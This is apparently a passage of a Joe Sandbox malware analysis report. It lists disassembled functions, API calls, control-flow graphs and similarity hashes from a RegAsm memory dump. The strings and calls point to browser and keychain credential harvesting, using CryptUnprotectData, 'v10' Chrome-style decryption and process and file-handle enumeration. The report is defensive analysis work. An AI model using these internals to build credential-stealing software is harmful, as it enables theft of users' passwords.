                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                  • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                  • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1945712969-0
                                                                                                                                  • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                  • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                  • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                  • API String ID: 2334598624-3798722523
                                                                                                                                  • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                  • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                  • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                  • API String ID: 1442760552-28296030
                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                  Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                  • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                  • String ID: chp$v10
                                                                                                                                  • API String ID: 229402216-2783969131
                                                                                                                                  • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                  • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 520 413e79-413eae call 413959 call 413ca4 CloseHandle 512->520 521 413e28-413e35 512->521 515 413ec8-413eda call 4099f4 513->515 516 413ebf-413ec6 free 513->516 518 413edb-413ee2 515->518 516->518 526 413ee4 518->526 527 413ee7-413efe 518->527 520->511 524 413e61-413e68 521->524 525 413e37-413e44 GetModuleHandleW 521->525 524->520 528 413e6a-413e77 QueryFullProcessImageNameW 524->528 525->524 530 413e46-413e5c 525->530 526->527 527->508 528->520 530->524
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                  • API String ID: 3957639419-1740548384
                                                                                                                                  • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                  • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                  • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                  • String ID: bhv
                                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                  • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                  • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                  • __p__commode.MSVCRT ref: 00446785
                                                                                                                                  • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                  • _initterm.MSVCRT ref: 004467C7
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                  • _initterm.MSVCRT ref: 004467FD
                                                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                  • exit.MSVCRT ref: 00446897
                                                                                                                                  • _cexit.MSVCRT ref: 0044689D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
